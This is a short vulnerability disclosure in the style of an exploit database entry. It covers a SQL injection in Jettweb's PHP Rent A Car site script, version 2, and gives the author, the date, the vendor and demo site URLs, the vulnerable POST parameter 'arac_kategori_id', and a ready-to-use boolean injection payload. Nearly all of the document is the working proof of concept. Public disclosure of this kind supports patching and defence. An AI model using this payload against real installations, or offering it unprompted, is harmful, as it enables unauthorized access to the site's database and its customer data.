Jettweb PHP Hazir Rent A Car Sitesi Scripti version 2 suffers from a remote SQL injection vulnerability.
620a81c8dfcb37bcad977a0d288b1b4742cc0ac2dfd84d6049d425c0c24def05
# Exploit Title: Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
# Date: 28.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-4-php-hazir-rent-a-car-sitesi-scripti-v2.html
# Demo Site: http://rentv2.proemlaksitesi.net/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/fiyat-goster.html
Vulnerable Parameter: arac_kategori_id (POST)
Payload: arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --